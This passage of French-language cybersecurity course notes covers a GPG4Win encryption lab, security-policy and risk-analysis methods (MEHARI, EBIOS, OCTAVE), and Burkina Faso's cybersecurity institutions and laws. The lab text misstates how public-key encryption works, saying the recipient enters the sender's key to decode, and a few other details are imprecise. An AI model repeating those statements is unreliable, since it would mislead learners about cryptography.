Zimmermann, désormais géré par l'éditeur Symantec (pgp.com).
De nombreux outils open source s'appuient sur GPG pour des aspects de chiffrement et
authentification ; GpG4Win est un outil graphique pour Windows permettant d'exploiter
GnuPGP. La capacité de répondre aux questions suivantes permettra une meilleure
appropriation de l'outil (voir https://www.gpg4win.org/features.html ).
1. Qu'est-ce que la cryptographie symétrique ?
2. Qu'est-ce que la cryptographie à clé publique ?
3. Quel est l'algorithme de cryptage par défaut ainsi que la taille des clés par défaut de
GpG4Win?
4. Qu'est-ce qu'un algorithme de Hachage ? Expliquer quels sont les algorithmes de
hachage disponibles par défaut dans Gpg4Win.
5. Qu'est-ce qu'un certificat ? Expliquer quels sont les deux formats de certificats
supportés par GpG4Win.

Utilisation
1. Installer GpG4Win. C'est un ensemble de logiciels comprenant :
- KLEOPATRA est le gestionnaire de certificats format X.509 ou OpenPGP ;
- GpGOL : plugin GpG pour Outlook pour encrypter et signer des emails directement
depuis outlook ;
- GpGEx : plugin GpG pour Explorateur Windows pour encrypter et signer directement
depuis l'explorateur Windows ;
- COMPENDIUM : documentation (env 200p) sur Kleopatra, GpgEX, PGP/MIME,
S/MIME et X.509.
2. Créer une clé privée :
a. Lancer GPA (Gnu Privacy Assistant). Lors du premier démarrage, GPA vous signale
que vous ne disposez pas encore de clé de chiffrement. Cliquer sur Générer la clef
maintenant dans la boîte de dialogue qui s'affiche.
b. Remplir les différents champs nécessaires à la création : votre nom, un votre
adresse e-mail et un mot de passe d'au moins 8 caractères.
c. Après quelques secondes de calcul, le logiciel vous signale que votre clé est créée.
Une boîte de dialogue vous suggère alors d'en effectuer une sauvegarde. Vous
sauvegardez alors sur votre disque dur ou votre clé (lequel est plus sécurisé ?). A
chaque fois que vous correspondrez avec une nouvelle personne, il vous faudra lui
demander sa clef... Et lui envoyer la vôtre si vous voulez avoir une réponse. Vous
pouvez aussi coder vos messages avec votre clef. Pour décoder le message, le
destinataire devra entrer votre clé.
d. Travail à faire : communiquer avec un de vos camarades en utilisant vos clés.
3. Utiliser Gpg4win avec les logiciels de messagerie :
a. Utiliser Gpg4win avec Outlook (GpgOL) : si vous avez procédé à l'installation du
plug-in GpgOL, Outlook disposera de commandes spécifiques. Il suffit simplement
de les sélectionner dans la barre d'outils pour signer, chiffrer ou déchiffrer les
messages.
b. Utiliser Gpg4win avec Thunderbird (Enigmail) : si vous utilisez Thunderbird, il vous
faut installer l'extension Enigmail (fourni). Sitôt le plug-in installé, de nouvelles

41
 Atelier sur la cryptographie

commandes apparaîtront dans la barre d'outils pour signer, chiffrer ou déchiffrer les
messages.
c. Si votre logiciel ne dispose pas de plug-in Gpg4win, vous pouvez chiffrer, déchiffrer
ou signer les messages en passant par le logiciel GPA. L'opération se fait par
l'intermédiaire du presse-papiers. Dans GPA, affichez la fenêtre Presse-papiers
(accessible via la barre d'outils ou le menu Fenêtres). Tapez ou collez le texte dans
cette fenêtre puis choisissez la commande Chiffrer (ou Signer).
d. Si vous recevez la clé d'un ami, vous pouvez l'ajouter à votre porte-clés (bouton
Importer dans GPA). A chaque fois que vous rencontrerez un nouvel utilisateur,
vous devrez lui demander sa clé.
e. Travail à faire :
i. signer un mail et envoyer à un de vos camarades qui devra vérifier votre
signature puis vous envoyer un mail signé que vous vérifierez.
ii. chiffrer un document et envoyer lui pour qu'il déchiffre et vous renvoie un fichier
chiffré que vous devrez déchiffrer.

42
 VI.Politique de sécurité

1. Élaboration d'une politique de sécurité

Définition : Notion de politique de sécurité

Une politique de sécurité est l'ensemble des modèles d'organisation, des procédures et des
bonnes pratiques techniques permettant d'assurer la sécurité d'un SI

Axes d'une politique de sécurité

Une politique de sécurité peut être organisée autour de 3 axes :
 La sécurité physique des installations;
 La sécurité logique du système informatique;
 La sensibilisation des utilisateurs aux contraintes de sécurité.
La politique de sécurité d'un SI constitue le principal document de référence en matière de SSI
de l'organisme. Elle en est un élément fondateur définissant les objectifs à atteindre et les
moyens accordés pour y parvenir. La démarche de réalisation de cette politique est basée sur
une analyse des risques en matière de SSI.
La politique de sécurité informatique fixe les principes visant à garantir la protection des
ressources informatiques et de télécommunications en tenant compte des intérêts de
l'organisation et de la protection des utilisateurs.
Les ressources informatiques et de télécommunications doivent être protégées afin de garantir
la confidentialité, l'intégrité et la disponibilité des informations qu'elles traitent, dans le respect
de la législation en vigueur.
Diriger la sécurité informatique passe donc par la définition d'une politique de sécurité et la
formation du personnel. La politique de sécurité informatique est en constante évolution et se
traduit par un problème de gestion de la qualité constante lié pour l'essentiel à la
maintenabilité et à l'évolution des SI, des enjeux et des risques.

Contenu d'une politique de sécurité

 Une politique de sécurité traite de l'organisation de la sécurité, de l'inventaire des
risques, de la définition d'une architecture de sécurité et de l'établissement d'un plan de
continuité.
 Une politique de sécurité définit:
- La politique de contrôle d'accès : gestion des identités, des profils, ...
- La politique de protection : prévention des intrusions, des vulnérabilités, ...
- La politique de réaction : gestion des crises, des sinistres, ...
- La politique de suivi : audit, évaluation, optimisation
- La politique d'assurance.

Étapes d'une politique de sécurité

les étapes dans l'élaboration d'une politique de sécurité sont :
 Définition de la politique : ensemble des règles concernant les ressources informatiques
et les règles concernant les ressources physiques (documents papiers, accès aux
bâtiments);
 Identification des vulnérabilités : définir tous les points faibles;
 Évaluation des probabilités associées à chacune des menaces;
 Évaluation du coût d'une intrusion réussie;
 Choix des contre mesures;
 Évaluation des coûts et de l'adéquation des contre mesures;

43
 Politique de sécurité

 Décision : Application et mise en place des solutions.

Remarque : Cohérence des moyens

La réalisation d'une politique de sécurité passe par la mise en œuvre cohérente de :
 Moyens physiques : architecture des bâtiments, systèmes de contrôle d'accès,
destructeurs de documents;
 Moyens informatiques : contrôles de services et des machines;
 Règles d'organisation et moyens procéduraux : règles de fonctionnement qui doivent
être respectées.

Principe de mise en œuvre

Assurer la mise en œuvre d'une politique de sécurité consiste à garantir que, à chaque instant,
toutes les opérations sur les ressources ne soient réalisables et réalisées que par les acteurs
habilités.
Les bases de la réalisation de la politique de sécurité sont :
 Le confinement : l'ensemble des ressources est maintenu dans des domaines étanches;
l'accès se fait via un guichet protégé;
 Le principe du moindre privilège : pour qu'un système fonctionne en sécurité il faut
donner à ses utilisateurs exactement les droits dont ils ont besoin pour s'exécuter, ni
plus ni moins.
Il existe plusieurs méthodes "standards" de mise en œuvre de la politique de sécurité
informatique.

MARION
MARION pour Méthode d'Analyse des Risques Informatiques et Optimisation par Niveau, c'est
une méthode d'audit de la sécurité d'une entreprise, proposée en 1983 par le CLUSIF (Club de
la sécurité de l'information française) mais abandonnée en 1998 au profit de la méthode
MEHARI. Elle donne une évaluation chiffrée du risque informatique. Elle repose sur l'évaluation
des aspects organisationnels et techniques de la sécurité de l'entreprise à auditer. Son objectif
est de :
 situer l'entreprise auditée par rapport à un niveau jugé correct, et par rapport au
niveau atteint par les entreprises similaires;
 identifier les menaces et vulnérabilités à contrer.

COBIT
COBIT pour Control OBjectives for Information and Technology ISAC, propose un référentiel
pour les systèmes d'information.

EBIOS
EBIOS pour Expression des Besoins et Identification des Objectifs de Sécurité, permet
d'identifier les risques d'un SI et de proposer une politique de sécurité adaptée aux besoins de
l'entreprise ;

44
 Politique de sécurité

MEHARI
MEHARI pour MEthode Harmonisée d'Analyse de RIsques, est développée par le CLUSIF en
1995 et consiste en l'analyse des enjeux de sécurité pour spécifier les scénarios redoutés, et
en la classification préalable des entités du SI en fonction de trois critères de sécurité de base
(confidentialité, intégrité, disponibilité). Ces enjeux expriment les dysfonctionnements ayant
un impact direct sur l'activité de l'entreprise. Puis, des audits identifient les vulnérabilités du
SI. Et enfin, l'analyse des risques proprement dite est réalisée. Il s'articule autour de 3 types
de livrables :
 Le Plan Stratégique de Sécurité (PSS) qui fixe les objectifs de sécurité ainsi que les
métriques permettant de les mesurer;
 Le Plan Opérationnel de Sécurité (POS) qui définit pour chaque site les mesures de
sécurité qui doivent être mises en œuvre;
 Le Plan Opérationnel d'Entreprise (POE) qui assure le suivi de la sécurité par
l'élaboration d'indicateurs sur les risques identifiés et le choix des scénarios de
catastrophe contre lesquels il faut se prémunir.

OCTAVE
OCTAVE pour Operationally Critical Threat, Asset, and Vulnerability Evaluation, a été créé par
l'université de Carnegie Mellon (USA) en 1999, a pour but de permettre à une entreprise de
réaliser par elle-même l'analyse des risques de son SI en se basant sur un catalogue de
bonnes pratiques de sécurité qui est fourni avec la méthode. Elle est centrée sur la protection
des actifs de l'entreprise et le management du personnel, couvre l'ensemble des processus
métiers de l'entreprise à tous les niveaux (organisationnel et technique). Elle est constituée de
3 étapes : Vue organisationnelle, Vue technique et Stratégie de sécurité. Ces vues
fonctionnent comme suit :
 La vue organisationnelle permet d'identifier les actifs de l'entreprise, les menaces qui
pèsent sur son fonctionnement, les vulnérabilités de son organisation, les objectifs de
sécurité imposés par la direction et les mesures actuelles de sécurité ;
 La vue technique identifie les éléments essentiels de chaque actif identifié plus haut et
les audite afin d'en connaître les vulnérabilités ;
 Le développement de la stratégie de sécurité consiste à évaluer les risques identifiés
(impact, probabilité) plus haut et à proposer les mesures permettant de les réduire.

CRAMM
CRAMM pour CCTA Risk Analysis and Management Method, c'est une méthode exhaustive
inventée par Siemens en Anglettre. Elle est réservée aux grandes entreprises car elle est assez
lourde (recourt à près de 3 000 points de contrôle). Elle possède deux variantes : CRAMM
Express et CRAMM Expert et comporte 3 phases :
 Identification de l'existant;
 Évaluation des menaces et des vulnérabilités;
 Choix des remèdes.

Mesures de sécurité
Après identification des risques, des mesures de sécurité sont mises en place. Plusieurs types
génériques de mesures de sécurité sont identifiés:
 Avant sinistre :
- Mesures préventives : détecteur d'intrusion, anti-virus, contrôle d'accès, ...
- Mesures structurelles : occultation des ressources, fragmentation de l'information
afin de réduire la vulnérabilité des ressources;
- Mesures de dissuasion : protections juridiques ou administratives.
 Après sinistre :
- Mesures palliatives et correctives : sauvegardes, plan de continuité, redondances ;

45
 Politique de sécurité

- Mesures de récupération : limiter les pertes/préjudices, utilisation d'assurance ou

attribution de dommages/intérêts par des actions en justice.

Plan de secours
Le plan de secours permet d'assurer un fonctionnement des applications critiques après un
sinistre. Il doit être suivi comme un vrai projet et suivre une méthodologie qui pourrait être en
quatre phases suivies d'un audit :
 Analyse stratégique :
- Organisation et conduite de projet;
- Analyse des risques;
- Analyse d'impact;
- Définition des modes de fonctionnement normal et minimal de chaque application
critique.
 Analyse des solutions :
- Identifier et évaluer les solutions de reprises possibles et de choisir la meilleure en
fonction des critères stratégiques de l'entreprise ;
- Procéder à la rédaction des documents définitifs.
 Mise en œuvre opérationnelle :
- Attribution des responsabilités, sensibilisation et formation des responsables de
l'exécution des procédures de reprise ;
- Une documentation complète du plan de secours doit être établie.
 Validation et suivi :
- Permet de tester le plan de secours, son efficacité par des simulations d'alertes et la
réalisation de tests de bascule programmés ;
- Permet de documenter et analyser les résultats ;
- Permet de mettre à jour le plan et éventuellement de réorganiser la répartition des
tâches aux membres de l'équipe.
 Audit : évaluer, déterminer la qualité du plan établi et élaborer des recommandations.

2. Sensibiliser le personnel aux risques encourus

Généralités
Les objectifs d'une sensibilisation du personnel sont :
 Limiter les risques d'un piratage à cause d'une erreur humaine ;
 Éviter les fuites/pertes de données volontaires/involontaires ;
 Réduire les tentatives d'usurpation d'identité de votre entreprise.
Les outils utilisés sont :
 Charte informatique : définir les droits et les devoirs de chacun en matière de
protection des données personnelles, de confidentialité des informations sensibles et
d'usage des outils informatiques;
 Politique de sensibilisation : newsletter, affiches dans les bureaux/salles de réunion,
mémos, ...
 Formations spécifiques : en fonction des profils il peut y avoir des risques spécifiques
(RH, comptabilité, ...).

Complément : Sauvegarder régulièrement ses données informatiques

 Effectuer des sauvegardes fréquentes des données:
- des sauvegardes journalières d'une durée d'une semaine ;
- des sauvegardes hebdomadaires d'une durée d'un mois ;
- des sauvegardes mensuelles d'une durée de 6 mois ;

46
 Politique de sécurité

- des sauvegardes semestrielles d'une durée d'un an ;

- des sauvegardes annuelles qui seront conservées définitivement.
 Stocker les sauvegardes sur un site extérieur: Serveur miroir? Disque dur hors ligne?
Coffres ignifuges et étanches?
 Protéger les données sauvegardées au même niveau de sécurité que celles stockées sur
les serveurs d'exploitation;
 Lorsque les sauvegardes sont transmises par le réseau, chiffrer le canal de transmission
si celui-ci n'est pas interne à l'organisme.

Complément : Sécuriser le réseau de l'entreprise

Il faut contrôler l'accès :
 des utilisateurs par identification, authentification;
 des ordinateurs en vérifiant les adresses MAC;
 des réseaux en utilisant:
- Pare-feu;
- DMZ;
- IDS;
- VPN;
- Filtrage ...

Complément : Protéger les terminaux mobiles

On peut le faire en :
 Maintenant le système à jour;
 Évitant de télécharger les applications hors stores officiels;
 Vérifiant les permissions des applications;
 Ne pas rooter / jailbreaker son terminal;
 S'équipant de solutions de sécurité.

Complément : Protéger les données personnelles

On peut protéger les données personnelles en :
 Sensibiliser les utilisateurs sur la question;
 Authentifier les utilisateurs;
 Gérer les habilitations des utilisateurs;
 Journaliser les accès et définir des procédures de gestion d'incidents;
 Sécuriser les postes de travail et l'équipement mobile;
 Encadrer la sécurité des données avec les sous-traitants;
 Encadrer la maintenance et la destruction des données;
 Chiffrer ou signer pour garantir l'intégrité, ...

Complément : Sécuriser les locaux

Il faut aussi sécuriser les locaux :
 Salles climatisées avec des portes et fenêtres hermétiques en vitre pour les postes
nécessitant le matériel informatique ;
 Acquisition de housses pour les machines ;
 Détecteurs de fumées ;
 Conservation des supports de sauvegarde dans un coffre-fort ;
 Aménagement des salles nécessitant le matériel informatique loin des endroits
humides ;
 Utiliser des alarmes anti-intrusion ;

47
 Politique de sécurité

 Mettre en place des détecteurs de fumée ainsi que des moyens de lutte contre les
incendies;
 Protéger les clés permettant l'accès aux locaux et les codes d'alarme;
 Distinguer les zones des bâtiments selon les risques ;
 Tenir à jour une liste des personnes ou catégories de personnes autorisées à pénétrer
dans chaque zone;
 Établir les règles et moyens de contrôle d'accès des visiteurs.

Conseil : Faire régulièrement des tests de sécurité

Il faut faire régulièrement les tests de sécurité :
 Simulation d'attaques dans un cadre officiel;
 Audit sécurité;
 ISO 27001.

Disposer d'un plan d'action et de reprise en cas d'attaque

Il faut disposer d'un plan de reprise ne cas d'attaque :
 Rédiger un plan de reprise et de continuité d'activité informatique même sommaire,
incluant la liste des intervenants ;
 S'assurer que les utilisateurs, prestataires et sous-traitants savent qui alerter en cas
d'incident ;
 Tester régulièrement la restauration des sauvegardes et l'application du plan de
continuité ou de reprise de l'activité.

48
 VII.Cadre réglementaire

1. Cadre institutionnel

Cadre institutionnel Burkinabè

Au Burkina plusieurs institutions et ou agences s'occupe da la sécurité informatique :
 ARCEP : Autorité de Régulation des Communications Electroniques et de Postes;
 CIL : Commission de l'informatique et des Libertés;
 ANR : Agence Nationale de Renseignement
 ANSSI : Agence Nationale de la Sécurité des Systèmes d'information.
 BCLCC : Brigade Centrale de Lutte Contre la Cybercriminalité;
 Justice ;
 ANPTIC : Agence Nationale de Promotion des TIC;
 DGTIC : Direction Générale des TIC, ...

La CIL
Elle a pour missions :
 Informer les personnes sur leurs droits et leurs obligations en matière de traitement de
données personnelles;
 Réguler en matière de protection de données en donnant son avis sur les déclarations
(implantation des cameras, les procédure d'achat de drone, la question de l'identifiant
unique de la personne,...);
 Contrôler pour s'assurer du respect du bon usage des données personnelles;
 Sanctionner en cas d'eccart et faire sanctionner les infractions les plus graves par le
juge (pouvoir de dénonciation).

L'ARCEP
Elle a pour mission :
 Réguler le secteur de la télécommunication (équipements, exploitation, identification
des usagers, utilisation des données, ...);
 Projet de mise en œuvre d'une infrastructure de gestion de clé publique (PKI) au niveau
national.

La BCLCC
Elle a pour missions de :
 Sensibiliser les usagers en publiant régulièrement les informations sur les attaques;
 Pouvoir d'investiguer (contrairement à la CIL) lorsqu'il y a infraction ou suspections
d'infraction;
 Pouvoir de réprimer.

La Justice
Elle concourt à :
 Exploiter des preuves numérique issues des investigations;
 Intenter des actions en justice ;
 Constitue l'agent OPJ selon convention de Budapest.

49
 Cadre réglementaire

ANPTIC
L'ANPTIC a pour missions de :
 Faire la promotion du bon usage des TIC;
 Protéger l'infrastructure de communication national (RESINA, G-CLOUD, ...);
 Concevoir, réaliser, exploiter, maintenir, le SI national.

DGTIC
La DGTIC a pour missions de :
 Elaborer des stratégies dans le domaine du numérique;
 Définir les politiques sectorielles en matière du numérique.

ANSSI
L'ANSSI a pour mission :
 Protéger le Cyberespace national , c'est à dire :
- réduire la vulnérabilité du cyberespace;
- gérer les incidents de sécurité des SI;
- renforcer la culture de la cybersécurité;
- établir des normes spécifiques a la SI;
- veiller au respect de l'audit obligatoire.
 se constituer agent technique selon Budapest car elle fournit les preuves numériques à
la BCLCC (OPJ) qui les interprète pour la justice (le parquet);
 veiller au Conseil National de Suivi de la mise en œuvre de la SNCS, créé par arrêté
N°2020-059/PM/CAB du 24 novembre 2020.

2. Cadre juridique

Nécessité
Les menaces cybernétiques sont sans frontières d'où la nécessité de considérer un cadre
juridique international régit par des conventions internationales :
 Convention de Budapest sur la cybercriminalité;
 Convention de l'union africaine sur la cyber sécurité et la protection des données a
caractère personnel;
 Directive de la CEDEAO sur la lutte contre la cybercriminalité dans l'espace CEDEAO.
Il y a aussi un cadre juridique national burkinabè.

Convention de Budapest sur la cybercriminalité

 Elle a été conclue à Budapest le 23 novembre 2001;
 Elle est approuvée par l'Assemblée fédérale le 18 mars 2011;
 Elle porte sur :
- Les infractions contre la confidentialité, l'intégrité et la disponibilité des données et
systèmes informatiques;
- Les infractions informatiques notamment : la falsification informatique, la fraude
informatique, les infractions se rapportant au contenu (pornographie enfantine,) et
les infractions liées aux atteintes à la propriété intellectuelle et aux droits connexes;
- les procédures de réquisition en matière informatique, la collecte, et les
compétences en la matière ...

50
 Cadre réglementaire

Convention de l'union africaine sur la cybersécurité et la protection des

données a caractère personnel
Adopté par la 23ème Session Ordinaire de la Conférence de l'Union à Malabo, le 27 juin 2014
et portant sur les transactions électroniques :
 Le Commerce Électronique;
 Les obligations conventionnelles sous forme électronique (contrat électroniques, L'écrit
sous forme électronique, ...);
 La sécurisation des transactions électroniques;
 La protection des données à caractère personnel;
 Les obligations relatives aux conditions de traitements de données à caractère
personnel;
 Les droits conférés à la personne dont les données font l'objet d'un traitement
 Les obligations du responsable de traitement de données à caractère personnel
 Les Mesures de Cyber sécurité à prendre au niveau national (politique nationale,
stratégie nationale);
 La qualification des infractions.

Directive de la CEDEAO sur la lutte contre la cybercriminalité dans l'espace

CEDEAO
Adoptée le 18 août 2011 à Abuja au Nigeria, elle s'applique à:
 Toutes les infractions relatives à la cybercriminalité dans l'espace CEDEAO;
 Toutes les infractions pénales dont la constation requiert la collecte de preuve
électronique.

Cadre juridique national

Les éléments du cadre national sont :
 Loi 061 et ses modificatifs de l'ARCEP;
 Loi N°001-2021/AN du 30 Mars 2021 portant protection des personnes à l'égard du
traitement des données à caractère personnel;
 Loi 045 portant règlementation des services de transactions électroniques au Burkina
Faso;
 Décret N°2012-964 /PRES/PM/MTPEN/MJ/MEF/MFPTSS/MICA portant sur les échanges
électroniques entre les usagers et les autorités administratives et entre les autorités
administratives elles-mêmes;
 L'élaboration du RGS (Référentiel Général de Sécurité) est fixé dans le Décret N°2012-
964 /PRES/PM/MTPEN/MJ/MEF/MFPTSS/MICA à l'article 13 : il y est prévu qu'un arrêté
du PM fixe le RGS et les conditions de sa mise en œuvre;
 Il y a un avant projet de loi portant sécurité des SI en cours d'adoption (il porte sur
l'obligation de l'audit périodique pour les OIC, l'obligation d'homologation des solutions
et matériel de sécurité sur le territoire, l'obligation de disposer des agréments en
matière de SSI pour importer les solutions et matériel de sécurité,...);
 LOI N°040-2019/AN PORTANT CODE DE PROCEDURE PENAL

51
 Cadre réglementaire

3. Cadre réglementaire

Cadre réglementaire
Il y a des cadres international, régional et national :
 Stratégie régionale de cybersécurité et de lutte contre la cybercriminalité de la CEDEAO
et de la Mauritanie;
 Politique régionale de protection des services essentiels et des infrastructures critiques
de la CEDEAO et de la Mauritanie;
 Le RGS-BF = référentiel général de sécurité adopté le 23 septembre 2019 par arrêté
2019-023/PM/SG du PM;
 La SNCS-BF = stratégie nationale de cybersécurité adopté le 31 décembre 2019 par
arrêté 2019-034/PM/SG du PM ;
 Les exigences en matière de gestion de risques de sécurité : le RGS fixe l'échelle
d'évaluation du risque mais n'impose pas les outils et les méthodes (donc chacun peut
utiliser les méthodes et outils qu'il veut : EBIOS, MEHARI, ...);
 Les règles et exigences relatives à la cryptographie : le RGS fixe des règles pour la mise
en œuvre de l'infrastructure de confiance;
 Les condition de réalisations des audits de sécurité au Burkina et surtout pour les OIC :
être accrédité par l'ANSSI ...
 Les conditions en matière d'homologation des solutions et matériel de sécurité au
Burkina Faso;
 Les conditions en matière d'hébergement des données surtout sensibles sur les Clouds
privés;
 etc.

Cadre réglementaire (SNCS)

Elle contient :
 Les fondements ;
 La vision;
 Les principes directeurs;
 Les orientations stratégiques.
Elle définit :
 Les instruments ;
 Les acteurs ;
 Le dispositif de supervision ;
 Le dispositif de suivi et évaluation.

52